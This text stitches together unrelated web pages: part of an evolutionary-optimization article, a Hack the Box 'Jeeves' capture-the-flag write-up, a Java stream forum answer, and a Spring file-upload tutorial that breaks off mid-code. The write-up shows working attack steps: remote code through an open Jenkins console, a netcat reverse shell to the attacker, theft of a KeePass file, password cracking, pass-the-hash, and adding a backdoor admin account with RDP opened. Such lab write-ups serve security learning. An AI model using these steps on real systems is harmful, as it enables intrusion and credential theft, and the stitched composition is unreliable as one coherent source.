            '   <input type="file" name="files['+ fileIndex +']" />'+
            '</td></tr>');
    });
});
</script>
</head>
<body>
    <h1>Spring Multiple File Upload example</h1>
    <form:form
    <p>Select files to upload. Press Add button to add more file inputs.</p>
    <input id="addFile" type="button" value="Add File" />
    <table id="fileTable">
        <tr>
            <td><input name="files[0]" type="file" /></td>
        </tr>
        <tr>
            <td><input name="files[1]" type="file" /></td>
        </tr>
    </table>
    <br/><input type="submit" value="Upload" />
    </form:form>
</body>
</html>

Note that we defined the file input names as files[0], files[1], etc. This will map the submitted files to the List in the form bean. I would suggest you go through this tutorial to understand how Spring maps multiple entries from a form to a bean: Multiple Row Form Submit using List of Beans.

The second view page is to display the filenames of the uploaded files. It simply loops through the filename list and displays the names.

file_upload_success.jsp

<[email protected]
    <li>${file}</li>
</c:forEach>
</ol>
</body>
</html>

5. Spring Configuration

In the Spring configuration (spring-servlet.xml) we define several important settings. Note how we defined the bean multipartResolver. This will make sure Spring handles the file upload correctly using the CommonsMultipartResolver class.

spring-servlet.xml

<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="" xmlns:
    <context:annotation-config />
    <context:component-scan
    <bean id="multipartResolver"
        class="org.springframework.web.multipart.commons.CommonsMultipart>

6. Output

Execute the project in Eclipse. Open the following URL in a browser to see the file upload form. URL: Select files through the file dialog and press the Upload button to upload. The following page will be displayed with the list of files being uploaded.
We have added a small JavaScript snippet for the Add button. This will add more file upload components to the page. Use this if you want to upload more files.

Download Source Code

SpringMVC_Multi_File_Upload_example.zip (3.6 MB)

Hi Viral! A great tutorial! How do we restrict the file types being uploaded? The use case being I want the user to upload only .pdf files or .xls files.

You can use a validator: first register your validator, then you apply that validator to the uploaded file. I hope this helps.

Hi Creg, in your reply you said: first register your validator, then apply. Can you please show us where to register and where to apply, and where to create the validator? Do we need a configuration somewhere? Thanks

Hello there, nice tutorial. Just one warning: when I run your example after downloading it from here, I get the following exception stacktrace: You should change the line of code: for this one: doing so, it won't duplicate the same last index when selecting the "Add File" button. Regards!

Very good tutorial, thanks.

this is very good to learn java, keep going with this site so we can become java experts hahahahaha, thanks viralpatel

Thanks for this example. It's easy to understand. I have downloaded the source code, but I am not able to run the project. I am getting a 404 error. What is missing?

Spring Multiple File Upload example. Following files are uploaded successfully. CreateDB.sql

Where are the uploaded files placed? I want to use ajax (not form submit) to read the selected file in the file input. Can you help me…

Hi, I need to send a similar form but using AJAX. Any solution? Thanks a lot!

hai all, can you help me now? For some of my homework (one of many problems): "how to upload an xls file with ASP MVC 3 to a database?" Please share with me a simple sample ASP MVC3 program. Database: SQL Server. Example: database name_DB = db_school, name_table = tbl_student, Field = – id, name

Thanks for the detailed explanation.
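The first comment above asks how to restrict uploads to .pdf or .xls. As a hedged sketch (the class and method names here are mine, not from the tutorial), one simple approach is an extension whitelist checked against MultipartFile.getOriginalFilename() in the controller, or inside a Spring Validator as the reply suggests. Note that extension checks are easily spoofed; for real safety you would also inspect the content type or file signature.

```java
import java.util.Locale;
import java.util.Set;

public class FileTypeValidator {

    // Whitelist of allowed extensions; adjust to your use case.
    private static final Set<String> ALLOWED = Set.of("pdf", "xls");

    // Returns true when the filename ends in an allowed extension.
    // In the controller you would call this with
    // multipartFile.getOriginalFilename() and reject the upload otherwise.
    static boolean isAllowed(String fileName) {
        if (fileName == null) {
            return false;
        }
        int dot = fileName.lastIndexOf('.');
        if (dot < 0 || dot == fileName.length() - 1) {
            return false;  // no extension at all
        }
        String ext = fileName.substring(dot + 1).toLowerCase(Locale.ROOT);
        return ALLOWED.contains(ext);
    }

    public static void main(String[] args) {
        System.out.println(isAllowed("report.PDF"));  // true
        System.out.println(isAllowed("virus.exe"));   // false
    }
}
```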
Before visiting this page I didn't know anything about file upload; now I can write file upload code easily. Regards, sid

I was not sure where the files were uploaded… So I just modified your code a little with the help of some other example. And here is the full running code: 1. Just create the D:\Test\Upload directory structure or whatever. 2. Copy this code to FileUploadController.java

When I copied your updated controller, the file is getting uploaded into the location. But I'm getting this error. Please clarify.

java.io.IOException: Destination file [C:\Temp\Upload] already exists and could not be deleted
org.springframework.web.multipart.commons.CommonsMultipartFile.transferTo(CommonsMultipartFile.java:130)

I got the solution for the above exception. I just added a condition like this and added the files in the last step. Please see the code below:

Hi Sathya, how do I get a path and store the path in a MySQL database with the help of Hibernate? Please send me a [email protected] Thank you

thankyou soo muucch for ur valuable and timesaving concept :)

Thanks much Sathya :) This was helpful :)

cool machi…yenga tale viral-kku oru ooooooo podu…

Hi Viral, could you please rectify the following exception

This really helped me. I struggled a lot to get this done before seeing this tutorial/topic. Thank you.

very nice tutorial for beginners.

Really a great tutorial.

I am getting the file name as null in the controller. Here is my controller code. Please help me

Check if you have added it in spring-servlet.xml

Hi, thanks for sharing. Nice one.

Hi, dynamically added file inputs are not working. When I click on Add File and upload three files, I still get only the default two files. The dynamically added file objects are not available in the controller. Please help!

I am getting java.io.IOException: Destination file [C:\TEMP] already exists and could not be deleted. However the file is getting uploaded and updated.

Please see my code below:

I want to show the image after uploading it, so can you help me to get that code in the .jsp and also the controller?

Hi Viral, really these examples help me a lot. But please do one favor for me: please develop an application to select two files from the browser (txt1, txt2) and display them in the browser, and when clicking the Save button it will ask for the location on the hard disk to save the files. And please send me this application to my id – [email protected] and if possible then give me your number as well. Thanking you ========== Devesh Anand

How many changes are required to convert this to an Ajax based file upload?

I have a repository class where I want to store the image that is coming from MultipartFile into the webapp/resources/images directory before adding the product details to the repository. My repository class is ResourceLoaderAware. I am getting a FileNotFoundException; "imagesDesert.jpg" is the image I am trying to upload.

Hi Viral, do you have any idea about sending email with multiple attachments? Actually I referred to the below link and it's working fine for a single attachment…. Please share if you have any idea. Thank you

hey, I want to remove attached files… please give me code as early as possible.

function confirmation() {
    alert("Please check your mail and attachment");
}

$(document).ready(function() {
    //add more file components if Add is clicked
    $('#addFile').click(function() {
        var fileIndex = $('#fileTable tr').children().length;
        if (fileIndex == 0) {
            fileIndex = fileIndex;
        } else if (fileIndex == 2) {
            fileIndex = fileIndex - 1;
        } else {
            var i = fileIndex / 2 - 1;
            fileIndex = i + 1;
        }
        $('#fileTable').append(' ');
    });
    $('#delfile').live('click', function() {
        $(this).parent().parent().html("");
        return false;
    });
});

java code———————— thank you…..

Getting this error when I try to execute this code: java.lang.IllegalArgumentException: Document base C:\Documents and Settings\temp\My Documents\NetBeansProjects\WebRatan\build\web does not exist or is not a readable directory

viralupload FileUploadController FileUploadController com.FileUploadController FileUploadController /FileUploadController spring org.springframework.web.servlet.DispatcherServlet 1 contextConfigLocation /WEB-INF/spring-servlet.xml org.springframework.web.context.ContextLoaderListener spring *.html index.html index.htm index.jsp default.html default.htm default.jsp

Hi Viral, I have learnt so many things from your blog…. Can you help me out with doing file uploading using AngularJS and Spring?

hey, viralpatel! I was wondering how one can store and retrieve an image (or a list of images) to and from a database, say, MySQL. I'm really struggling with this for days now. Thank you!

I followed your code. I want to save the file in a database; can you specify the code in the controller method, like dao.save()? And what to write in the DAO class?

hi, I got this error. Please give me a solution:

type Exception report
message An exception occurred processing JSP page /index.jsp at line 1
description The server encountered an internal error that prevented it from fulfilling this request.
exception org.apache.jasper.JasperException: An exception occurred processing JSP page /index.jsp at line 1
1:

How can I see the uploaded files? Can you please help me…

Hi, I am getting a null value in @ModelAttribute("uploadForm") FileUploadForm uploadForm
http://viralpatel.net/blogs/spring-mvc-multiple-file-upload-example/
Service Bus Routers And Queues in .NET Services March 2009 CTP

As InfoQ has previously reported, Microsoft has recently released a new CTP of the Azure Services Platform. A centerpiece of Azure .NET Services is the Service Bus, which:

... provides the familiar Enterprise Service Bus application pattern, while helping to solve some of the hard issues that arise when implementing this pattern across network, security, and organizational boundaries, at Internet-scale

According to Clemens Vasters, the most significant change in the March 2009 CTP is the addition of service bus routers and queues. The implementation of service bus routers and queues is facilitated through a change in the service bus namespace. Clemens Vasters explains:

The relationship between any messaging primitive and the Service Bus namespace is established by picking a name in your project's Service Bus hierarchy... and then assign a role to that name... all names in a Service Bus namespace that can theoretically exist do already exist and their role is 'none'. So when I'm assigning a role to a name, I don't create the name itself. The name is already there, it's just in hiding...

He calls routers and queues "primitives" because these capabilities explicitly allow for composition. The capabilities of a queue are defined by queue policies, which are somewhat similar to the policies of typical JMS queues and can be accessed and managed using both WS-* and REST APIs.

Microsoft views the .NET Service Bus as an implementation of the ESB pattern, which has grown in popularity over the years because it simplifies the management of multiple service connections. One way it does this is by enabling publish/subscribe architectures, which provide for even looser coupling throughout an enterprise. The introduction of queuing support through service bus routers and queues in the .NET Services March 2009 CTP brings this vision one step closer to reality.
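The router primitive described above is, at its core, the publish/subscribe pattern: a named endpoint fans each published message out to every current subscriber. The sketch below is not the .NET Service Bus API (which is .NET/WCF-based with WS-* and REST bindings); it is only a toy in-memory illustration of the pattern, with all names invented here.

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.function.Consumer;

// Toy illustration of the router idea: a named endpoint that fans each
// published message out to all subscribers registered under that name.
public class ToyRouter {

    private final Map<String, List<Consumer<String>>> subscribers = new HashMap<>();

    public void subscribe(String routerName, Consumer<String> handler) {
        subscribers.computeIfAbsent(routerName, k -> new ArrayList<>()).add(handler);
    }

    // Delivers the message to every subscriber; returns the delivery count.
    public int publish(String routerName, String message) {
        List<Consumer<String>> handlers =
                subscribers.getOrDefault(routerName, List.of());
        for (Consumer<String> h : handlers) {
            h.accept(message);
        }
        return handlers.size();
    }

    public static void main(String[] args) {
        ToyRouter bus = new ToyRouter();
        List<String> seen = new ArrayList<>();
        bus.subscribe("/orders", seen::add);
        bus.subscribe("/orders", m -> seen.add("audit:" + m));
        bus.publish("/orders", "order-42");
        System.out.println(seen);  // [order-42, audit:order-42]
    }
}
```

A real service bus adds what this toy lacks: durable queues behind the router, policies governing delivery, and identity/access control at each name.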
http://www.infoq.com/news/2009/04/NetServices
Raible Designs: Matt Raible is a UI Architect specializing in open source web frameworks. Contact me for rates.

2009-07-15T22:39:28-06:00 | Apache Roller (incubating)
This is an XML content feed. It is intended to be viewed in a newsreader or syndicated to another site, subject to copyright and fair use.

Raible Road Trip #13 Trip Report (Matt Raible, 2009-07-05)

[Photo: Mount Rushmore]

Last Monday morning, my Dad, Abbie, Jack and I loaded up our rig and embarked upon Raible Road Trip #13. We rolled through Custer, South Dakota around 4:30 in the afternoon and arrived at Mount Rushmore just after 5. After gawking at Rushmore, we took a meandering route through 1-car tunnels and Custer State Park. We saw a plethora of bison, some antelope and lots of nice campsites.

[Photos: Buffalo in Custer State Park, Antelope in Custer State Park, Campsite near Custer]

On Tuesday, we woke up early and began the 9-hour drive to Fairmont Hot Springs. We pulled in right around 5 and had a blast in the pool and on the water slide. When we got there, we discovered that the pools were open 24 hours. Abbie and I were still up when my Dad and Jack fell asleep, so we snuck out and played in the pool by the fading light of the 10:00 sunset.

[Photos: Fairmont Playground, Kids loved the slide]

On Wednesday, we arrived at The Cabin around 5 after a brief stop in Missoula to get some clown costumes (for the parade) and have some of the best ice cream in the world (according to Jack). Abbie learned how to chop wood and Jack got to ride on all the tractors. My Mom arrived from Oregon later that night.

[Photos: Ha yah!, Learned how to chop wood for the first time, Driving the Ford]

Thursday and Friday, we worked on The New Cabin and got ready for the Swan Valley 4th of July Parade. While camping in Custer, Abbie and I decided to be clowns for the parade and we were fortunate enough to find costumes in Missoula. My Mom had to drastically shrink Abbie's to fit, but her hard work paid off when Abbie won 1st Place among all the walkers. She was sooo cute as a little clown and I was a proud Dad for pulling off another fun parade.

[Photos: Abbie the Clown, Clown Family]

After the parade, we ate some huckleberry ice cream and watched the O-Mok-See for a couple hours. Then we joined up with my friend Owen and his family and enjoyed an afternoon boating on Holland Lake. We closed the night watching fireworks and got to bed really late.

Since we've been here, we've seen a couple bears (while riding the 4-wheeler with each kid) and my Mom saw a mountain lion walk in front of the cabin this morning. The mosquitos are vicious, but the weather is beautiful. For more pictures from the last week, see my Montana 2009 - Week 1 set on Flickr.

- David Thomas, VP of Technology, Evite

Modify your dependencies to match the ones below. With the Codehaus plugin, dependencies are much more concise.

JSON Parsing with JavaScript Overlay Types in GWT (Matt Raible, 2009-06-24)

A reader recently asked:

[reader question and JSNI overlay type code lost in extraction]

This class alone allows you to easily parse JSON returned in a callback. For example, here's an example of parsing Twitter's User Timeline in my OAuth with GWT application.
</p> <pre class="brush: java">>To simply things even more, we created a BaseModel class that can be extended.</p> <pre class="brush: java">); } } <>.</p> <p style="text-align: center"> <a href="" title="The Great Sand Dunes"><img src="" width="500" height="375" alt="The Great Sand Dunes" style="border: 1px solid black" /></a> </p> <p <a href="">flight is delayed</a>.. <">("<meta http-equiv=\"refresh\"")) { String";()); }< <em>send()</em> method as well as utility methods to get the cookie values of the oauth tokens.</p> <pre class="brush: java">); } }</pre> <p>If all goes well, the response contains the data you requested and it's used to populate a textarea (at least in this demo application). Of course, additional processing needs to occur to parse/format this data into something useful.</p> <p>This all sounds pretty useful for GWT applications, right? I believe it does - but only if it works consistently. I sent <a href="">a message</a> to the OAuth Google Group explaining the issues I've had. </p> <p class="quote" style="color: #666">? </p> <p>I received a <a href="">response</a> with a cleaner <em>makeSignedRequest()</em>. </p> <p>To make it easier to create a robust example of GWT and OAuth, I created a gwt-oauth project you can <a href="">download</a> or <a href="">view online</a>..>.. </p> <p. </p> >My two favorite parts of the trip were 1) the people and 2) the place. There was around 15 of us, many of which have been good friends since college. We stayed at the Paraiso Maya, which was a very nice hotel with beautiful pools, elaborate buffets and awesome beach access. We had a ton of fun at the pool bar, playing water basketball, jet skiing and playing beach volleyball. The dinners at the Steakhouses were great and The Galaxy (Star War themed) club created many good memories. It's great to travel with that many people, especially when the beer is flowing for (what seems like) free and you're partying with old friends. <> <em>without</em> GXT. 
After a day, we had an application with *.cache.html files of 133K. Yes, that's over a 50% reduction in size!*

Today is a very special day in my Dad's life. Today is his last day of work. Within the next hour, Joseph Edward Raible, Jr. will officially become retired and subsequently one of the happiest people I know. My dad has always had an interesting relationship with work. I've never met someone who hated working for The Man more, yet had such a strong work ethic.

Growing up in Montana, my dad always had the shittiest jobs. When I was a toddler, he used to walk several miles to work, often during the cruel Montana winters. As I got older, I remember him working as a carpenter, logger, trail crew specialist, firefighter, radio technician and even a programmer. The reason his jobs were so shitty is because he told us they were. I don't think he made over $5/hour until I was in the second grade.

... as a Network Administrator. After 6 months, they hired him and he quickly moved up the ranks. I believe his current title is something fancy like Director of Wireless Communications. Over the last 19 years, he's worked for the BLM and done amazing things like setting up radio networks in Honduras and Tanzania. He's turned into quite the world traveler.

The thing I remember the most is his perseverance. One winter when he couldn't find work, he built a barn. From scratch, mostly by himself.

The other thing I remember well is how much he complained about work. It was never the actual work that he complained about, it was the "stupid fuckin' idiots" that he had to work with (or for). This is the reason that this is such a special day. I can't help but think a huge weight is being lifted from his shoulders and he's going to be much happier.
Then again, you know how these things go - he might actually miss having people around to complain about.

One thing's for sure, I'm super pumped and happy for the guy. He plans on moving back to Montana for the summer to work on the New Cabin and it's likely I'll get to spend a lot more time with him in the coming years. :-D

Optimizing a GWT Application with Multiple EntryPoints (Matt Raible, 2009-03-25)

If you're going to release early, release often with GWT, chances are you'll just want to release one feature at a time.

To enable history support in this application, I implemented HistoryListener in my EntryPoint (Application.java) and added the following logic to initialize:

[code sample lost in extraction]

In this example, HistoryTokens is a class that contains all the URLs of the "views" in the application.

public class HistoryTokens {
    public static final String ...

Next week, I'm helping to polish and document our entire release process (from dev → qa → production). If you have any advice on how to best perform releases with Maven, Grails and/or Nexus, I'd love to hear about it. My goal is extreme efficiency so releases can be done very quickly and with minimal effort.

I'm writing up a blog post on how to setup a Software Development Company for consultants and wanted to see what retirement plan I have. I'd like to recommend it (or others, if there's better deals). Do you have the name and a 2-3 sentence description?

Below is his response:

You have a SEP IRA but depending on how much they make and their savings objective they may also want an Individual 401K and/or Defined Benefit Plan.
A SEP IRA allows you to set aside up to 20% of your income after business expenses, up to $49,000 for those with income of $245,000 or more in 2009. An Individual 401K allows you to save a higher percentage of your income depending on your age and income. If you are under age 50 you are able to save $16,500 so long as your income is at least $16,500 (plus FICA, etc.), and $22,000 for those over age 55. You are also able to set aside profit sharing and matching contributions in a 401K Plan. Those under age 50 have a maximum of $49,000 while those over age 50 have an increased limit of $54,000. Finally, for those who wish to save more, you could establish a Defined Benefit Plan and make contributions based on your age and income that total potentially more than $200,000 per year. If you establish a Defined Benefit Plan you are still able to have an Individual 401K Plan, but the limits are the employee contribution amount ($16,500 or $22,000) plus 6% of your income up to $245,000 (another $14,700) for a combined total that could be well over $200,000 depending on your age and income.

There is always the Roth and Traditional IRA, but those are very basic planning tools - they should still be used and considered, and everyone should be familiar with them. 2009 allows a $5,000 deposit for those under age 50 and $6,000 for those over age 50. Roth contributions are limited starting at $105,000 if filing single and $166,000 if married filing jointly.

Of course, a perk of working for a company with benefits is they sometimes do 401K matching. However, I'd expect many companies to be cutting back on that in this economy. If you're an independent consultant, do you have a retirement plan? Do you think you're doing as well as you could if you were a full-time employee?
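The SEP IRA figures quoted above are consistent: 20% of $245,000 is exactly the $49,000 cap, which is why the cap applies at that income. As a worked example (my own simplification, using only the 2009 numbers from the advisor's reply and ignoring the finer self-employment tax adjustments a real calculation would include):

```java
public class SepIraLimit2009 {

    private static final double RATE = 0.20;      // 20% of net income
    private static final double CAP  = 49_000.0;  // 2009 dollar cap

    // Simplified 2009 SEP IRA limit per the figures quoted in the post:
    // 20% of income after business expenses, capped at $49,000.
    // Rounded to whole dollars for illustration.
    static long sepLimit(double netIncome) {
        return Math.round(Math.min(RATE * netIncome, CAP));
    }

    public static void main(String[] args) {
        System.out.println(sepLimit(100_000));  // 20000
        System.out.println(sepLimit(245_000));  // 49000 - the cap kicks in here
        System.out.println(sepLimit(400_000));  // 49000 - still capped
    }
}
```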
First of all, I believe that contracting is better in this economy for a very simple reason:

When you're a contractor, you're prepared to be let go.

Being a contractor forces you to better yourself so you're more marketable.

So you've decided to take my advice and try your hand at contracting. Should you setup your own Corporation or LLC?

Starting a Company

Update:

The future of the web may be as ubiquitous as electricity. Chris has a desktop, two laptops (one 10" NetBook, one a 13" MacBook) and an iPhone. There's a lot of difference between these devices, especially when it comes to screen size. Chris uses a number of different browsers throughout the day. The web isn't just one browser, it isn't just one platform. He's showing a slide with a browser market share graph.

Many different browsers are a reality. Many different devices are a reality. Web builders need to learn to write scalable applications that run across multiple browsers, devices and environments. They need to use progressive functionality and learn the tools they have in CSS and HTML. Semantic structuring helps.

Opera Mini does its processing on the server-side. This allows Opera to gather statistics. These stats show that users around the world hit the same top sites on their mobile devices as they do on their desktops. It's a one-to-one match. Opera is seeing tremendous growth in the usage of Opera Mini, both in developed countries and emerging markets.

The web is kinda important these days. It's a big deal. Make a mistake and 300 million dollars go away (see end of last entry about United news). One of the beauties of the web is you can easily participate as an individual. You can report bugs, write articles and be a part of many web standards groups.
Most of the other systems in the world don't provide this kind of access.

Dan has been under a rock for the last 5 years working on Semantic Web stuff. Now that he's back in the game, it's incredible how much stuff is going on. He's glad there are JavaScript frameworks so he doesn't have to learn everything. The default security policies in browsers are a little rickety at this point. They allow you to download and run JavaScript from virtually any site. Caja might help to solve this. Dan believes that security will become more important and stricter to protect web users.

Scott Fegette
Scott is a Product Manager in the Web Group of Adobe. At the beginning of each year, they do heavy user research. Adobe wants people that develop content for the web to be as expressive as possible. Scott is going to give us a peek into the conversations he's had with the web community.

One of the biggest topics on people's minds is the economy, but it's not as negative as you might think. Small web designers are actually getting more business in the downturn, likely because companies are polishing their presence on the web. People are working much more distributed these days. There are a few areas that Adobe generally asks about: CSS, JavaScript, and HTML (both static and dynamic).

Frameworks are becoming more important to developers, as well as with clients. They've even seen some clients demand certain frameworks. Two years ago, when Adobe talked to small design shops and agencies, most web sites were built statically. Now they're developing with frameworks like WordPress. Out of 60 folks they talked to, only 2 were using static systems and not a CMS.

The other big investments for Adobe are RIAs and AIR. Ajax has matured enough that it can now compete with proprietary plugins like Flash. The reason for AIR is to allow web developers to use their skills to develop desktop applications.
Flash and Flex are often overkill for browser-based applications, but they do often handle video and audio better than Ajax applications.

Mike (TM) Smith
Mike is also known as the "W3C HTML jackass". Mike thinks the state of the web is that it's a mess in a lot of ways. If you don't believe him, ask Doug Crockford. Most of this stuff is going to remain a mess for the next 20 years, unless another genius like Tim Berners-Lee comes along and invents something new. However, the good part about it being a mess is that we all have jobs.

One of the biggest things they're trying to do with HTML 5 is not break backward compatibility. Other working groups at the W3C don't share this philosophy, hence the reason they don't have browser vendors participating. Many of the ideas for HTML 5 came from Gears and Ajax framework developers like John Resig. All this will make things less messy, especially with the help of browser vendors.

Developers like the ubiquitous web and are pushing the mobile web. Mike thinks everyone just needs to get a life (big applause). For mobile, SVG has already been a big success. You will see significant things with SVG happen in major browsers by next fall. If you're a web developer, you should spend some time experimenting with SVG. It will pay off for you. If it doesn't pay off for you and you see Mike next year at Web Directions North, you can punch him in the face.

Location-aware applications will be big as well. Browser vendors are implementing the Geolocation API. It's implemented in Opera, Firefox, WebKit and Gears. Video on the web will be significant as well. The SVG working group pioneered video support in standards, before HTML 5. Many of the problems they face are related to video codecs. The only way to solve the problems with video on the web is with money and lawyers. Very specifically, there's no royalty-free codec for video.
This is nothing that standards bodies can solve. The most promising development is that Sun Microsystems is developing an open codec and spending money to make sure they're not infringing on patents.

After each panelist talked, John asked them questions about the biggest thing they'd like to see implemented by everyone (an open video codec and the Geolocation API were the winners). Mike also did some complaining about XML and how broken it is because there's no failure mechanism. There was some audience banter with Chris about SVG in IE.

Conclusion
This was a very interesting session, especially to hear from the people who are building/supporting the future of the web. I liked Scott's talk on what Adobe's hearing from their users. I also liked hearing Mike (TM)'s opinionated thoughts on XML and his non-marketing approach to most everything related to the web. Lars from Opera had a marketing-ish presentation, but it was nevertheless interesting to hear what Opera's working on. Good stuff.

[Photo: After the run home]

My mom is a Montana native who wasn't afraid to raise her kids in the backwoods at her family's homestead. It sounds like a crazy idea to me, but she made it happen - cooking over a wood stove every day and working at the Swan Valley Ranger Station to make ends meet. She was responsible for getting us out of Montana and on to Oregon. She went back to school in her early 40s, got a degree in Forestry from the University of Montana and moved the whole family to Oregon for a job with the BLM.

As much fun as I've had, I'm looking forward to getting back to Denver and hanging out with my kids. January 2009 is sure to be one for the books. I start a new gig at a new office tomorrow. On Wednesday, the kids return from Florida to a mountain of presents at my house.
My parents are coming to town next weekend, followed by a trip to Tahoe and a weekend in Steamboat to finish out the month.
http://feeds.feedburner.com/rd.cfm%3Fsite=http://www.sqlmag.com/articles/index.cfm%3Farticleid=97373
crawl-002
refinedweb
3,822
71.14
NAME
       fcntl - manipulate file descriptor

SYNOPSIS
       #include <unistd.h>
       #include <fcntl.h>

       int fcntl(int fd, int cmd, ... /* arg */ );

DESCRIPTION
       fcntl() performs one of the operations described below on the open file
       descriptor fd.

       F_DUPFD_CLOEXEC (int; since Linux 2.6.24)
              Specifying this flag permits a program to avoid an additional
              fcntl() F_SETFD operation to set the FD_CLOEXEC flag. For an
              explanation of why this flag is useful, see the description of
              O_CLOEXEC in open(2).

   File descriptor flags
       F_GETFD (void)
              Read the file descriptor flags; arg is ignored.

       F_SETFD (long)
              Set the file descriptor flags to the value specified by arg.

   File status flags
       F_GETFL (void)
              Read the file status flags; arg is ignored.

       F_SETFL (long)
              Can only change the O_APPEND, O_ASYNC, O_DIRECT, O_NOATIME, and
              O_NONBLOCK flags.

   Advisory locking

   F_SETLEASE and F_GETLEASE (Linux 2.4 onwards) (long)

   File and directory change notification (dnotify)
       F_NOTIFY (long)
              ...; see signal(7).

SEE ALSO
       dup2(2), flock(2), open(2), socket(2), lockf(3), capabilities(7),
       feature_test_macros(7)

       See also Documentation/locks.txt, Documentation/mandatory.txt, and
       Documentation/dnotify.txt in the kernel source.

COLOPHON
       This page is part of release 3.15 of the Linux man-pages project. A
       description of the project, and information about reporting bugs, can
       be found at.
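The descriptor-flag commands above (F_GETFD/F_SETFD with FD_CLOEXEC) can be exercised from Python's standard `fcntl` module, which wraps the same system call. A minimal sketch, for POSIX systems only:

```python
import fcntl
import os

# Open a throwaway descriptor to experiment on.
fd = os.open("/dev/null", os.O_RDONLY)

# F_GETFD: read the file descriptor flags (no arg needed).
flags = fcntl.fcntl(fd, fcntl.F_GETFD)

# F_SETFD: set FD_CLOEXEC so the descriptor is closed across exec().
fcntl.fcntl(fd, fcntl.F_SETFD, flags | fcntl.FD_CLOEXEC)

# Confirm the flag is now set.
print(bool(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC))  # True
os.close(fd)
```

As the DESCRIPTION notes, opening with O_CLOEXEC (or duplicating with F_DUPFD_CLOEXEC) avoids the separate F_SETFD round trip shown here.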
http://manpages.ubuntu.com/manpages/jaunty/man2/fcntl64.2.html
CC-MAIN-2014-41
refinedweb
192
54.29
CodePlex Project Hosting for Open Source Software

Anyone tried having multiple widget zones? Since they all share the same datastore, they all end up looking the same. I'm working on a way to store the widget data under the ID of the WidgetZone. Therefore it's possible to have multiple widget zones all configured differently...

You may be wondering why I need this. Well, I wanted a way to show a single widget on a page (e.g. a link editor on a links.aspx). Rather than creating a new control, I figured I could just host a single link editor widget on the page... not possible with the standard code, as all widget zones share the same settings... Have I missed something, or is my modification the only way to show widgets with different settings?

Cheers

Multiple widgetzone support was added to BE in changeset 1.5.1.0 on April 18th. The latest build can be downloaded on the Source Code tab above. With the new multiple widgetzone capability, you can specify a "ZoneName" for each widget zone. Each zone contains its own separate data. Here's a blog post describing the new capability.

That sounds exactly like what I've just implemented! Glad to see I'm not the only one needing this feature...

Joe

I have tried to upgrade from BE 1.5.0.7 to BE 1.5.1.11 with blogengine-27919.zip, as I want to implement Multiple Widget Zones. Perhaps I am doing something wrong. The build says something like 'BlogRollItem cannot be found in namespace Blogengine.Core' (is there a missing reference to an assembly?) Can anybody help - I am quite new here. Thanks!

Poul

If you download any of the builds from the Source Code tab, it's required to build/compile the BlogEngine core project. When that project is built, you'll have a new BlogEngine.Core.dll file that you will put into your BIN folder. The BE core project can be built using the free Visual Web Developer 2008 Express Edition (if you don't already have Visual Studio installed on your computer).

Thanks a lot Ben - it really works fine now.
I thought in my naivety that it had already been done by you, the contributor of the ZIP file, and that the content of the bin folder was missing. Thanks again!

Poul

I would like to use the multiple widget zones and all other updates included in the current BlogEngine ver 1.5.1.11 or higher source code. Hence the first person - and only one person - (must be a registered developer of codeplex - blogengine.net) who sends me a built/compiled version of the BlogEngine core project will receive $50 via PayPal. My email is yasir@simdi.com
http://blogengine.codeplex.com/discussions/59684
CC-MAIN-2017-30
refinedweb
491
76.32
So I was coding along working on another DLL. I recompiled a DLL containing the following code and suddenly my program was crashing. When I clicked the show info link on the 'send this report to Microsoft' dialog box, it said the DLL which was throwing the error was msvcp90d.dll. I tracked it down to the log function (the debugger said it couldn't be evaluated):

#include "log.h" (includes <iostream>, <fstream>, <string> and has the log structure)

RupLogger::RupLogger() {
    logfile.open("log.txt", ios::out);
}

RupLogger::~RupLogger() {
    logfile.close();
}

void RupLogger::log(string msg) {
    logfile << msg + " \n";
}

So I decided to try something. The "Logger Started" line below is logged correctly, but log still crashes.

RupLogger::RupLogger() {
    logfile.open("log.txt", ios::out);
    logfile << "[SYS] Logger Started \n";
}

So I thought there might be some strange issue with the logfile object's access or something, so I tried this:

void RupLogger::log(string msg) {
    this->logfile << "[SYS] Test Log \n";
    this->logfile << msg + " \n";
}

Now this is where it gets freaky. The debugger jumps into the ostream header and says the following is not evaluating (in bold):

Line 746: streamsize _Pad = [B]_Ostr.width()[/B] <= 0 || [B]_Ostr.width()[/B] <= _Count ? 0 : [B]_Ostr.width()[/B] - _Count;

And um, well, now I'm just confused >.< and would like my program to run correctly again...
https://www.daniweb.com/programming/software-development/threads/199930/heres-a-hard-one-ostream-include-msvcp90d-dll-not-working
CC-MAIN-2017-34
refinedweb
225
58.21
QtCreator project with folder named "new"

I noticed a strange behaviour with qmake, using Qt Creator. I have a project with many files allocated in different folders. One of these folders is named "new". The strange thing is, every time I edit some file located in this folder, the whole project is recompiled, instead of recompiling only the edited file (.cpp file). Changing files in other folders, the behaviour is correct. Renaming the new folder solves the problem. A non-Qt project doesn't have this issue. Actually I am using Qt 5.7.1 with MinGW 5.3.0 on Windows 7.

It is very easy to reproduce. Create a new Qt project. Add a new file and put it in a folder named new. After compiling the whole project, try to change the newly added file.

Is it a known problem? Thank you for any hint

- mrjj Lifetime Qt Champion last edited by mrjj

Hi
It's not something I have seen reported before. Also, I tried to reproduce in a new project using your step-by-step but it only compiles test.cpp in the new folder. Could you perhaps post your .pro file?

Thanks for the reply. This is my .pro file without any change, copied and pasted.

#-------------------------------------------------
#
# Project created by QtCreator 2019-03-19T15:43:18
#
#-------------------------------------------------

QT += core gui

greaterThan(QT_MAJOR_VERSION, 4): QT += widgets

TARGET = prova_new

SOURCES += \
    main.cpp \
    mainwindow.cpp \
    new/dummy.cpp

HEADERS += \
    mainwindow.h \
    new/dummy.h

FORMS += \
    mainwindow.ui

# Default rules for deployment.
qnx: target.path = /tmp/$${TARGET}/bin
else: unix:!android: target.path = /opt/$${TARGET}/bin
!isEmpty(target.path): INSTALLS += target

- mrjj Lifetime Qt Champion last edited by

Hi
Super. Well, it looks exactly like my test one. What do you have in dummy.h / dummy.cpp? Also, are they included in mainwindow or main? It could be a bug in Qt 5.7.1, as I'm testing with Qt 5.12. Must you use such an old version?
In dummy.h and dummy.cpp, nothing special:

#ifndef DUMMY_H
#define DUMMY_H

class Dummy
{
public:
    Dummy();
};

#endif // DUMMY_H

#include "dummy.h"

Dummy::Dummy()
{
}

main.cpp:

#include "mainwindow.h"
#include <QApplication>

int main(int argc, char *argv[])
{
    QApplication a(argc, argv);
    MainWindow w;
    w.show();
    return a.exec();
